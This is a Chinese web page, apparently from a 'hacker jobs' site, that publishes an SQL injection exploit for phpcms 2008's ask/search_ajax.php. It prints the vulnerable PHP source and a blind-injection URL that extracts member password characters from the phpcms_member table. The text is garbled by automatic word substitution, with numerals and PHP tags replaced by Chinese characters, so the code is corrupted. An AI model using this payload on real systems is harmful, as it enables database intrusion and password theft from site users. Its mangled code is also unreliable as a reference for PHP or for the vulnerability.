当前位置:首页 > 黑客接单 > 正文内容

phpcms2008-0day ask/search_ajax.php

访客3年前 (2022-04-21)黑客接单750

蒙影响法式 : phpcms 二00 八 gbk

破绽 文献:ask/search_ajax.php

code:

<必修php
require './include/co妹妹on.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf- 八');
if(strtolower(CHARSET) != 'utf- 八') $q = iconv(CHARSET, 'utf- 八', $q);
if($q)
{
$where = "大众title LIKE '%$q%' AND status =  五";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '',  一0);

foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="a877-5f31-ccbd-c6bb c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf- 八' 必修 iconv(CHARSET, 'utf- 八', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
必修>

测试要领 :
ask/search_ajax.php必修q=s%E 六'/**/or/**/(select ascii(substring(password, 一, 一))/**/from/**/phpcms_member/**/where/**/username=0x 七0 六 八 七0 六 三 六D 七 三)> 五 二% 二 三

标签: 好话题
分享给朋友:
返回列表

上一篇:全国首个强制报告App上线怎么回事?强制报告APP是做什么用的

下一篇:Game-of-Thrones-CTF-1.0靶机实战演练

“phpcms2008-0day ask/search_ajax.php” 的相关文章

什么是墨玉_墨玉和碧玉哪个更好3年前 (2022-04-21)
淘宝上有哪些好一点的男装品牌(淘宝销量最好的男装)3年前 (2022-04-21)
五羊本田踏板哪一款好 「五羊本田踏板车报价表」3年前 (2022-04-21)
佩戴红领巾的意义(为什么要戴红领巾30字)3年前 (2022-04-21)
华为路由器重置后上不了网怎么办(重置路由器的正确流程图)3年前 (2022-04-21)
500平别墅装修大概多少钱 - 400平米别墅装修100万3年前 (2022-04-21)

评论列表

纵遇稚然
纵遇稚然
2年前 (2022-10-11)

/where/**/username=0x 七0 六 八 七0 六 三 六D 七 三)> 五 二% 二 三

回复该评论
俗野卮酒
俗野卮酒
2年前 (2022-10-11)

ch($infos as $key=>$val) {$val['title'] = str_replace($q, '<span class="b408-6153-82bf-a877 c_orange">'.$q.'</spa

回复该评论

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright Your WebSite.Some Rights Reserved.